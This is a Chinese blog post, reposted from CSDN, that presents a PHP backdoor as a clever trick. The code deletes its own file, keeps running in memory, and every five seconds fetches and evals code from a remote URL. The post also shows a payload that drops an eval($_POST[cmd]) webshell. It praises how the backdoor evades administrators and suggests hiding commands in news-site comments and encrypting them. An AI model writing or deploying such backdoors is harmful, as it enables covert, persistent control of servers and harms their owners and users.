一个非常淫荡的PHP后门写作技巧

183次阅读
没有评论

原文 https://blog.csdn.net/h4ck0ne/article/details/50570790
<pre>&lt;?php

unlink($_SERVER[‘SCRIPT_FILENAME’]);

ignore_user_abort(true);

set_time_limit(0);

$remote_file = ‘http://xxx/xxx.txt’;

while($code = file_get_contents($remote_file)){

@eval($code);

sleep(5);

};

?&gt;</pre>
后门的代码第一行删除自身,然后驻留在后台内存里(关于 ignore_user_abort 函数,百度一下),等待外部链接

在 xxx.txt 中写入你的后门代码,访问后就会删除自己并循环执行 txt 的代码

例如 txt 里面写了一句这样的代码 file_put_contents(‘./1.php’,”&lt;?php @eval($_POST[cmd])'”?&gt;”);

这样就会在目录下又生成一个木马

如果对方写了是执行命令。。。

这段代码纯粹变成了一个等待命令的木马。。

而且管理员检查木马文件的时候  都找不到。。。

因为文件已经删除了

木马却注入在 php-fpm 内

sleep(5);  五秒就去远程读取一下指令。。。

……..

打算将代码修改一下,加一些正则,去 163 某一篇新闻的评论里读取预先设定的恶意代码。。。hehe。。。

黑客连服务器都省了。。。

黑客只需要去网易新闻评论窗口内写入自己的代码就行

怕别人看懂?

直接加密

采用对称加密算法。。没有秘钥 谁也看不懂啥意思

秘钥在这段后门里面写着

所以非常安全

活生生就是一个远控木马啊!!

正文完
有偿技术支持加微信
post-qrcode
 
评论(没有评论)
验证码